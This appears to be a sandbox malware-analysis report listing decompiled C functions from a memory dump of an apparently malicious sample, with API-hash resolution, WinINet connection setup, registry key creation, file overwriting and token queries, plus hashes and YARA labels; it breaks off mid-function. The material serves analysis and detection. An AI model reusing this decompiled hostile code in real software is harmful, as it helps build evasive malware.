    0x0080fe09
    0x0080fe09
    0x0080fe16
    0x0080fe2d
    0x00000000
    0x0080fe32
    0x0080fdf7
    0x0080fe3f

    APIs
    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0080FDF3
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateDirectory
    • String ID: .
    • API String ID: 4241100979-248832578
    • Opcode ID: 7297e3586b42db68d178466448ffdd7a598212c52d80c3342f42a5a221b12e1c
    • Instruction ID: d2318cd4849b871ec29ccc4b0726cc0c86d69a8747dcc8c2bd3bc29be2f15c2c
    • Opcode Fuzzy Hash: 7297e3586b42db68d178466448ffdd7a598212c52d80c3342f42a5a221b12e1c
    • Instruction Fuzzy Hash: 272195A1E4131436FA20B698AC4BFBF3658EF54755F044060FA08AA2C3F6E55B5482A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080ECF0, Relevance: 3.1, APIs: 2, Instructions: 99networkCOMMON
    Download Yara Rule
    C-Code - Quality: 46%
    			E0080ECF0(void* __eax, void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, intOrPtr _a16) {
				void* _v20;
				signed int _t14;
				void* _t16;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr* _t22;
				void* _t25;
				intOrPtr _t30;
				long _t31;
				char* _t32;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t41 = __eflags;
				_t30 = _a4;
				E0081F5C0(0x13, 0xd0ca371);
				_t14 = E008088A0(_t41,  !(E008074F0(_t41, _a16, 0xffffffff)) & 0x00000001, 0xffffffff);
				_t39 = _t36 + 0x18;
				_t27 =  !=  ? _t30 : 0x823f80;
				_t16 = InternetOpenA( !=  ? _t30 : 0x823f80, _t14 ^ 0x00000001, 0, 0, 0); // executed
				if(_t16 == 0) {
					L6:
					_t17 = 0;
				} else {
					_t25 = 0;
					_t31 = 3;
					_v20 = _t16;
					_t34 = 0x823b24;
					0;
					do {
						_t18 = E0081F5C0(0x13, 0x5b4d601);
						_t39 = _t39 + 8;
						_t4 = _t34 - 4; // 0x2
						 *_t18(_v20,  *_t4, _t34, 4);
						_t25 = _t25 + 1;
						_t34 = _t34 + 8;
						_t31 = _t31 - 1;
					} while (_t31 != 0);
					_t35 = _v20;
					_t32 = _a8;
					_t20 = E0080A9B0(_t32);
					_t39 = _t39 + 4;
					_t17 = 0;
					if(_t20 > 0) {
						E0081F5C0(0x13, 0xae775e1);
						_t39 = _t39 + 8;
						_t17 = InternetConnectA(_t35, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
						if(0 == 0) {
							_t22 = E0081F5C0(0x13, 0x714b685);
							_t39 = _t39 + 8;
							 *_t22(_t35);
							goto L6;
						}
					}
				}
				return _t17;
			}



















    0x0080ecf0
    0x0080ecf7
    0x0080ed04
    0x0080ed21
    0x0080ed26
    0x0080ed33
    0x0080ed3e
    0x0080ed42
    0x0080edd0
    0x0080edd0
    0x0080ed48
    0x0080ed48
    0x0080ed4a
    0x0080ed4f
    0x0080ed52
    0x0080ed5d
    0x0080ed60
    0x0080ed67
    0x0080ed6c
    0x0080ed72
    0x0080ed78
    0x0080ed7a
    0x0080ed7b
    0x0080ed7e
    0x0080ed7e
    0x0080ed81
    0x0080ed84
    0x0080ed88
    0x0080ed8d
    0x0080ed92
    0x0080ed96
    0x0080ed9f
    0x0080eda4
    0x0080edb8
    0x0080edbc
    0x0080edc5
    0x0080edca
    0x0080edce
    0x00000000
    0x0080edce
    0x0080edbc
    0x0080ed96
    0x0080edd9

    APIs
    • InternetOpenA.WININET(00823F80,00000000,00000000,00000000,00000000,?,?,?,?,?,008192FD,?,?,?,00000001,00000000), ref: 0080ED3E
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0080EDB8
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Internet$ConnectOpen
    • String ID:
    • API String ID: 2790792615-0
    • Opcode ID: 4ce3f8242324ab21604f84bf0ad1e5eb89adf62e79dc6533693882aed01049d4
    • Instruction ID: 09f5536fc52e8a3c4084a4ef1847c74bd267ab03d19335d14ed83471cb63490c
    • Opcode Fuzzy Hash: 4ce3f8242324ab21604f84bf0ad1e5eb89adf62e79dc6533693882aed01049d4
    • Instruction Fuzzy Hash: DF2108B2B8031537FE205AA46C13FAF355DEB91724F140534FE18F62C2E5A5AA0041B6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00812A80, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E00812A80(void* __eflags) {
				long _v20;
				WCHAR* _v24;
				struct HINSTANCE__* _v28;
				WCHAR* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v60;
				intOrPtr _v72;
				char _v76;
				char _v96;
				char _v116;
				char _v138;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr* _t27;
				int _t34;
				int _t35;
				int _t36;
				WNDCLASSW* _t41;

				_t18 = E00808AE0(0x82efaa4);
				_t41 =  &_v76;
				E0080AF10(_t41, _t18);
				_v72 = E008108C0;
				_t20 = E0081F5C0(0, 0xa39ecc7);
				_v60 =  *_t20(0);
				_v40 = E0080F180(0x823790,  &_v96);
				E0081F5C0(1, 0x38227e7);
				RegisterClassW(_t41); // executed
				_v36 = E0081F5C0(1, 0xf3c7b77);
				_t27 = E0081F5C0(0, 0xa39ecc7);
				_v28 =  *_t27(0);
				_v32 = E0080F180(0x823810,  &_v138);
				_v24 = E0080F180(0x823790,  &_v116);
				_v20 = E00808AE0(0x8e1fa8c);
				_t34 = E00808AE0(0x882efa8c);
				_t35 = E00808AE0(0x882efa8c);
				_t36 = E00808AE0(0x882efa8c);
				return CreateWindowExW(0, _v24, _v32, _v20, _t34, _t35, _t36, E00808AE0(0x882efa8c), 0, 0, _v28, 0);
			}






















    0x00812a8e
    0x00812a96
    0x00812a9b
    0x00812aa3
    0x00812ab1
    0x00812abd
    0x00812ad1
    0x00812adb
    0x00812ae4
    0x00812af5
    0x00812aff
    0x00812b0b
    0x00812b22
    0x00812b36
    0x00812b46
    0x00812b4e
    0x00812b5d
    0x00812b6c
    0x00812ba5

    APIs
    • RegisterClassW.USER32(?), ref: 00812AE4
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • CreateWindowExW.USER32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00812B9B
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: ClassCreateLibraryLoadRegisterWindow
    • String ID:
    • API String ID: 3459329703-0
    • Opcode ID: f0ffd27a2bc17829207ae931d750acb50e2a1cccb294c583fb43acefa24b11ea
    • Instruction ID: ec34308b00a24bd891f4f1ad82d3263fad4916e94a36fec755ec37f7c8557fcd
    • Opcode Fuzzy Hash: f0ffd27a2bc17829207ae931d750acb50e2a1cccb294c583fb43acefa24b11ea
    • Instruction Fuzzy Hash: 392121B6D402146EEB50ABE46C03FFE7A68FF15705F140031FA09E5283F9A116558BB3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00813130, Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E00813130(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t19;
				signed int _t24;
				long _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;
				void* _t33;
				short* _t38;
				void* _t41;
				void* _t42;
				void* _t46;

				E0081F5C0(9, 0x7b43ce7);
				_t42 = _t41 + 8;
				_t19 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				_t33 = 0;
				_t48 = _t19;
				if(_t19 == 0) {
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						_t38 = _a16;
						E0081ACA0(_t48, _a4, _t38, _v24, _v28);
						_t24 = E00808AE0(0x82efa85);
						E0081F5C0(_t24, E00808AE0(0xf9ac66b));
						_t46 = _t42 + 0x20;
						_t27 = RegCreateKeyExW(_v20, _t38, 0, 0, 0, 3, 0,  &_v32,  &_v36); // executed
						if(_t27 != 0) {
							goto L2;
						} else {
							_t31 = E0081F5C0(9, 0x3111c69);
							_t46 = _t46 + 8;
							 *_t31(_v32);
							if(_v36 != 1) {
								goto L2;
							} else {
								_t33 = 1;
							}
						}
						L7:
						_t29 = E0081F5C0(9, 0x3111c69);
						 *_t29(_v20);
						goto L8;
						L2:
						E00806CC0(__eflags, _t33, 1);
						_t42 = _t46 + 8;
						_t33 = _t33 + 1;
						__eflags = _t33 - 0x64;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L7;
				}
				L8:
				return _t33;
			}


















    0x00813146
    0x0081314b
    0x00813160
    0x00813162
    0x00813164
    0x00813166
    0x00813170
    0x00813177
    0x00813191
    0x00813197
    0x0081319e
    0x008131ab
    0x008131c4
    0x008131c9
    0x008131e2
    0x008131e6
    0x00000000
    0x008131e8
    0x008131ef
    0x008131f4
    0x008131fa
    0x00813200
    0x00000000
    0x00813206
    0x00813206
    0x00813206
    0x00813200
    0x0081320c
    0x00813213
    0x0081321e
    0x00000000
    0x00813180
    0x00813183
    0x00813188
    0x0081318b
    0x0081318c
    0x0081318c
    0x0081320a
    0x0081320a
    0x00000000
    0x0081320a
    0x00813220
    0x00813229

    APIs
    • RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,80000001,00000000,?,?,?), ref: 00813160
    • RegCreateKeyExW.KERNEL32(00000000,80000001,00000000,00000000,00000000,00000003,00000000,?,?), ref: 008131E2
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Create
    • String ID:
    • API String ID: 2289755597-0
    • Opcode ID: 07fb853be87c9ae89001baf86720459e6f413f576804172a7871d48516b79038
    • Instruction ID: 51fb37b4a732c53934cd67f8c5532365adb03b27cfc1f7d69d5023929aac9759
    • Opcode Fuzzy Hash: 07fb853be87c9ae89001baf86720459e6f413f576804172a7871d48516b79038
    • Instruction Fuzzy Hash: D521D3B1E403157FEB10AA949C43FEF3A2CFF55715F140034FA15B51C2F6A2AA5486B6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00820E00, Relevance: 3.1, APIs: 2, Instructions: 81fileCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E00820E00(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t15;
				long _t17;
				void* _t18;
				signed char _t20;
				intOrPtr* _t21;
				int _t25;
				long _t26;
				long _t27;
				signed char _t28;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t39;
				void* _t41;

				E0081F5C0(0, 0xad68947);
				_t15 = E00808AE0(0x482efa8c);
				_t26 = E00808AE0(0x82efa8e);
				_t17 = E00808AE0(0x82efa0c);
				_t39 = _t35 + 0x14;
				_t18 = CreateFileW(_a4, _t15, 1, 0, _t26, _t17, 0); // executed
				if(_t18 == 0xffffffff) {
					_t27 = 0;
					L9:
					return _t27;
				}
				_t34 = _t18;
				_t32 = _a8;
				_t28 = _t26 & 0xffffff00 | _t32 == 0x00000000;
				_t20 = E00804C00(_a12, 0);
				_t41 = _t39 + 8;
				if((_t28 & _t20) != 0 || ((_t28 ^ _t20) & 0x00000001) != 0) {
					L4:
					_t27 = 1;
					goto L7;
				} else {
					E0081F5C0(0, 0xabb2b5);
					_t41 = _t41 + 8;
					_t25 = WriteFile(_t34, _t32, _a12,  &_v20, 0); // executed
					if(_t25 == 0) {
						_t27 = 0;
						__eflags = 0;
						L7:
						_t21 = E0081F5C0(0, 0xb8e7db5);
						_t39 = _t41 + 8;
						 *_t21(_t34);
						_t48 = _t27;
						if(_t27 == 0) {
							E00821520(_t48, _a4);
							_t39 = _t39 + 4;
						}
						goto L9;
					}
					goto L4;
				}
			}


















    0x00820e0e
    0x00820e1d
    0x00820e34
    0x00820e3b
    0x00820e40
    0x00820e4f
    0x00820e54
    0x00820e9c
    0x00820ec3
    0x00820ecc
    0x00820ecc
    0x00820e56
    0x00820e58
    0x00820e5d
    0x00820e65
    0x00820e6a
    0x00820e6f
    0x00820e98
    0x00820e98
    0x00000000
    0x00820e78
    0x00820e7f
    0x00820e84
    0x00820e92
    0x00820e96
    0x00820ea0
    0x00820ea0
    0x00820ea2
    0x00820ea9
    0x00820eae
    0x00820eb2
    0x00820eb4
    0x00820eb6
    0x00820ebb
    0x00820ec0
    0x00820ec0
    0x00000000
    0x00820eb6
    0x00000000
    0x00820e96

    APIs
    • CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00820E4F
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00820E92
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$CreateWrite
    • String ID:
    • API String ID: 2263783195-0
    • Opcode ID: 999aa03f46c901ad06438117db62f6388a5a315142f2943780357ccab4bc23c2
    • Instruction ID: dde34d0b7871d3dc3135a98a82efd310021d7b8707dfcfdee6f80733e7c30eac
    • Opcode Fuzzy Hash: 999aa03f46c901ad06438117db62f6388a5a315142f2943780357ccab4bc23c2
    • Instruction Fuzzy Hash: 6D11E9A6B802143AEA5025A47C43FBF3608FF51759F090430FE09D92C3F9A29D9445B3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080EE40, Relevance: 3.1, APIs: 2, Instructions: 79fileCOMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E0080EE40(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t11;
				intOrPtr* _t13;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				WCHAR* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t26;

				_t19 = 0;
				_t20 = _a4;
				while(1) {
					E0081F5C0(0, 0xad68947);
					_t4 = CreateFileW(_t20, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t21 = _t4;
					_t5 = E00805BF0(_t4, 0);
					_t25 = _t23 + 0x10;
					if((_t5 & 0x00000001) == 0) {
						_t17 = E0081F5C0(0, 0xb8e7db5);
						_t25 = _t25 + 8;
						 *_t17(_t21);
					}
					E0081F5C0(0, 0xbf8ba27);
					_t26 = _t25 + 8;
					_t7 = GetFileAttributesW(_t20); // executed
					if(_t7 == 0xffffffff) {
						break;
					}
					_t11 = E0081F5C0(0, E00808AE0(0x2f8ba8b));
					 *_t11(_t20);
					_t13 = E0081F5C0(0, 0x7a2bc0);
					 *_t13(E00808AE0(0x82ef134));
					_t19 = _t19 + 1;
					_t16 = E00808AE0(0x82efa86);
					_t23 = _t26 + 0x1c;
					if(_t19 != _t16) {
						continue;
					}
					break;
				}
				E008046C0(_t20);
				return 0;
			}
















    0x0080ee46
    0x0080ee48
    0x0080ee50
    0x0080ee57
    0x0080ee72
    0x0080ee74
    0x0080ee79
    0x0080ee7e
    0x0080ee83
    0x0080ee8c
    0x0080ee91
    0x0080ee95
    0x0080ee95
    0x0080ee9e
    0x0080eea3
    0x0080eea7
    0x0080eeac
    0x00000000
    0x00000000
    0x0080eebe
    0x0080eec7
    0x0080eed0
    0x0080eee8
    0x0080eeea
    0x0080eef0
    0x0080eef5
    0x0080eefa
    0x00000000
    0x00000000
    0x00000000
    0x0080eefa
    0x0080ef01
    0x0080ef0f

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 0080EE72
    • GetFileAttributesW.KERNEL32(?), ref: 0080EEA7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$AttributesCreate
    • String ID:
    • API String ID: 415043291-0
    • Opcode ID: 9100399d9617e8eec24611d169c1ba32c767716f30ed273cb76e94e3330459cb
    • Instruction ID: 98a6918cc8d7efdb0a81a1569acc11046f5ec6c60348ae677ff60b82948d1ea5
    • Opcode Fuzzy Hash: 9100399d9617e8eec24611d169c1ba32c767716f30ed273cb76e94e3330459cb
    • Instruction Fuzzy Hash: 55113CA6B8421436F46035B87C47FBF250CEB62B6AF140531FE5AE52C3F992695500B7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080FBA0, Relevance: 3.1, APIs: 2, Instructions: 72COMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0080FBA0(intOrPtr _a4, void* _a8) {
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr* _t13;
				void* _t14;
				void* _t16;
				union _TOKEN_INFORMATION_CLASS _t21;
				long _t22;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;

				_v28 = 0;
				_v20 = 0;
				_t13 = E0081F5C0(9, 0xf2b7ebe);
				_t32 = _t31 + 8;
				_t14 =  *_t13(_a4, 8,  &_v20);
				_t37 = _t14;
				if(_t14 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t16 = E0081CD10(_t14, _t37, _v20); // executed
					_t33 = _t32 + 4;
					_t30 = _t16;
					if(_a8 != 0 && _t30 != 0 && 1 != 0) {
						_v24 = E0081F5C0(9, 0xbd557e);
						_t21 = E00808AE0(0x82efa80);
						_t22 = E00808AE0(0x82efa88);
						_t33 = _t33 + 0x10;
						if(GetTokenInformation(_v20, _t21, _a8, _t22,  &_v28) == 0) {
							E008046C0(_t30);
							_t33 = _t33 + 4;
							_t30 = 0;
						}
					}
					E0081F5C0(0, 0xb8e7db5);
					FindCloseChangeNotification(_v20); // executed
				}
				return _t30;
			}















    0x0080fbac
    0x0080fbb3
    0x0080fbc1
    0x0080fbc6
    0x0080fbd0
    0x0080fbd2
    0x0080fbd4
    0x0080fc5a
    0x0080fc5a
    0x0080fbda
    0x0080fbdd
    0x0080fbe2
    0x0080fbe5
    0x0080fbeb
    0x0080fc06
    0x0080fc11
    0x0080fc20
    0x0080fc25
    0x0080fc37
    0x0080fc3a
    0x0080fc3f
    0x0080fc42
    0x0080fc42
    0x0080fc37
    0x0080fc4b
    0x0080fc56
    0x0080fc56
    0x0080fc65

    APIs
      • Part of subcall function 0081CD10: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0081CD51
      • Part of subcall function 0081CD10: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0081CD99
    • GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 0080FC32
      • Part of subcall function 008046C0: RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0080FC56
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InformationToken$ChangeCloseFindFreeHeapNotification
    • String ID:
    • API String ID: 2311446219-0
    • Opcode ID: d68a7e83c23518c89a32501aa381eeb008a61606e5296508a325230dcf522666
    • Instruction ID: 5ce5b56e22c3cfa4dc69a57c515c5223614cc5a17f5fee192f700153c81a1fea
    • Opcode Fuzzy Hash: d68a7e83c23518c89a32501aa381eeb008a61606e5296508a325230dcf522666
    • Instruction Fuzzy Hash: A611E072E001296BEB50AAA45C07BFF7628FF11749F044030FE09E6282F6B15904C6F3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081CD10, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0081CD10(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				signed int _t8;
				int _t11;
				intOrPtr* _t13;
				void* _t15;
				int _t17;
				DWORD* _t19;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t26;

				_v20 = 0;
				_t8 = E00808AE0(0x82efa85);
				E0081F5C0(_t8, E00808AE0(0x893aff2));
				_t26 = _t23 + 0x10;
				_t19 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t19); // executed
				_t22 = 0;
				if(_t11 == 0) {
					_t13 = E0081F5C0(0, 0xc702be2);
					_t26 = _t26 + 8;
					if( *_t13() == 0x7a) {
						_t15 = E0081D310(_v20);
						_t26 = _t26 + 4;
						if(_t15 != 0) {
							_t20 = _t15;
							E0081F5C0(9, 0xbd557e);
							_t26 = _t26 + 8;
							_t17 = GetTokenInformation(_a4, 1, _t20, _v20, _t19); // executed
							_t22 = _t20;
							if(_t17 == 0) {
								E008046C0(_t20);
								_t26 = _t26 + 4;
								_t22 = 0;
							}
						}
					}
				}
				return _t22;
			}














    0x0081cd17
    0x0081cd23
    0x0081cd3c
    0x0081cd41
    0x0081cd44
    0x0081cd51
    0x0081cd53
    0x0081cd57
    0x0081cd60
    0x0081cd65
    0x0081cd6d
    0x0081cd72
    0x0081cd77
    0x0081cd7c
    0x0081cd7e
    0x0081cd87
    0x0081cd8c
    0x0081cd99
    0x0081cd9d
    0x0081cd9f
    0x0081cda2
    0x0081cda7
    0x0081cdaa
    0x0081cdaa
    0x0081cd9f
    0x0081cd7c
    0x0081cd6d
    0x0081cdb5

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0081CD51
      • Part of subcall function 0081D310: RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0081CD99
      • Part of subcall function 008046C0: RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: HeapInformationToken$AllocateFreeLibraryLoad
    • String ID:
    • API String ID: 4190244075-0
    • Opcode ID: 35a95335d0a60428c9f8e326201e8b9f588e861faf6b1d9a124cd406a9a807ae
    • Instruction ID: eab18625b94471089333b72b8fa9718f3fc7611c8afbdb423c266293a05f4f48
    • Opcode Fuzzy Hash: 35a95335d0a60428c9f8e326201e8b9f588e861faf6b1d9a124cd406a9a807ae
    • Instruction Fuzzy Hash: 1401C8B2A802253FEA507AA8BC43FAF395DEF91758F040430FD08E5182F5929D5441A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008066F0, Relevance: 3.1, APIs: 2, Instructions: 64registryCOMMON
    Download Yara Rule
    C-Code - Quality: 84%
    			E008066F0(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t14;
				signed char _t15;
				long _t17;
				long _t21;
				intOrPtr* _t22;
				signed int _t27;
				int _t28;

				_t15 = E008128A0(_t14, __eflags, 0xffffffff);
				E0081F5C0(9, 0x7b43ce7);
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t15 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if((E00804C00(_t17, 0) & 0x00000001) == 0) {
					_t27 = 0;
					__eflags = 0;
				} else {
					_t28 = _a16;
					E0081F5C0(9, 0xdd270b7);
					_t21 = RegSetValueExW(_a4, _a12, 0, _t28, _a20, _a24); // executed
					_t27 = _t28 & 0xffffff00 | _t21 == 0x00000000;
					_t22 = E0081F5C0(9, 0x3111c69);
					 *_t22(_a4);
				}
				return _t27;
			}










    0x008066fe
    0x00806716
    0x0080672f
    0x0080673e
    0x00806780
    0x00806780
    0x00806740
    0x00806746
    0x00806750
    0x00806763
    0x00806767
    0x00806771
    0x0080677c
    0x0080677c
    0x00806788

    APIs
    • RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0080672F
    • RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00806763
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateLibraryLoadValue
    • String ID:
    • API String ID: 3939425971-0
    • Opcode ID: edd5973851b5213e5fa7eb243f7f54231e00b0b324a0513fd1c84321d5db07f4
    • Instruction ID: 5a15e51bfa78b678968d8408b362273b3947682d5235fb841aa303bfd0efda02
    • Opcode Fuzzy Hash: edd5973851b5213e5fa7eb243f7f54231e00b0b324a0513fd1c84321d5db07f4
    • Instruction Fuzzy Hash: F50196B6A803147FEA105E95AC43FDB3B1CEF55769F140121FF18A61C2E5A1BA2581F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00816880, Relevance: 3.1, APIs: 2, Instructions: 61registryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E00816880(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				signed int _t15;
				intOrPtr* _t17;
				int _t22;
				signed int _t23;

				_t22 = (E008128A0(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0081F5C0(9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t22,  &_a4); // executed
				if(_t12 == 0) {
					E0081F5C0(9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t23 = _t22 & 0xffffff00 | _t7;
					_t15 = E00808AE0(0x82efa85);
					_t17 = E0081F5C0(_t15, E00808AE0(0xb3fe6e5));
					 *_t17(_a4);
				} else {
					_t23 = 0;
				}
				return _t23;
			}










    0x0081689c
    0x008168a6
    0x008168b7
    0x008168bb
    0x008168cb
    0x008168df
    0x008168e1
    0x008168e3
    0x008168e3
    0x008168e3
    0x008168eb
    0x00816904
    0x0081690f
    0x008168bd
    0x008168bd
    0x008168bd
    0x00816917

    APIs
    • RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 008168B7
    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 008168DF
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: OpenQueryValue
    • String ID:
    • API String ID: 4153817207-0
    • Opcode ID: 52cb92c72305e1b0ee1a577faa3b09caab4cda29b255efd2d5341c206a6b8321
    • Instruction ID: 86bfe8c122e913c06826e550bb1465693b56dd0211a363c09c82887cc0ce5bd3
    • Opcode Fuzzy Hash: 52cb92c72305e1b0ee1a577faa3b09caab4cda29b255efd2d5341c206a6b8321
    • Instruction Fuzzy Hash: 1401DDB2A403153BEA106A996C43FEB3A0CFF41769F140135FE58D61C2F991AA5541F7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00821580, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00821580(void** _a4) {
				int _t4;
				int _t7;
				void** _t9;
				void* _t10;

				_t9 = _a4;
				if( *_t9 != 0) {
					E0081F5C0(0, 0xb1fd105);
					_t10 = _t10 + 8;
					_t4 = VirtualFree( *_t9, 0, 0x8000); // executed
				}
				if(_t9[2] != 0) {
					E0081F5C0(0, E00808AE0(0x3a08739));
					_t7 = FindCloseChangeNotification(_t9[2]); // executed
					return _t7;
				}
				return _t4;
			}







    0x00821584
    0x0082158a
    0x00821593
    0x00821598
    0x008215a4
    0x008215a4
    0x008215aa
    0x008215bc
    0x008215c7
    0x00000000
    0x008215c7
    0x008215cb

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?), ref: 008215A4
    • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008215C7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindFreeNotificationVirtual
    • String ID:
    • API String ID: 560371109-0
    • Opcode ID: ed43cb352e3f1780bab2b8b75c082ce65ccdd9d70744ace9ee51fbe1a8b7cff0
    • Instruction ID: c72768312863590c202fa13e3931155a576633d56af4e5c0aa46400d0176c449
    • Opcode Fuzzy Hash: ed43cb352e3f1780bab2b8b75c082ce65ccdd9d70744ace9ee51fbe1a8b7cff0
    • Instruction Fuzzy Hash: 5FE09231A80210BAE5202E98FC07B95768CFF11746F144435FA8EA11D2EAA129D085A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008010E0, Relevance: 1.6, APIs: 1, Instructions: 121COMMON
    Download Yara Rule
    C-Code - Quality: 51%
    			E008010E0(intOrPtr* _a4, intOrPtr _a8) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v72;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
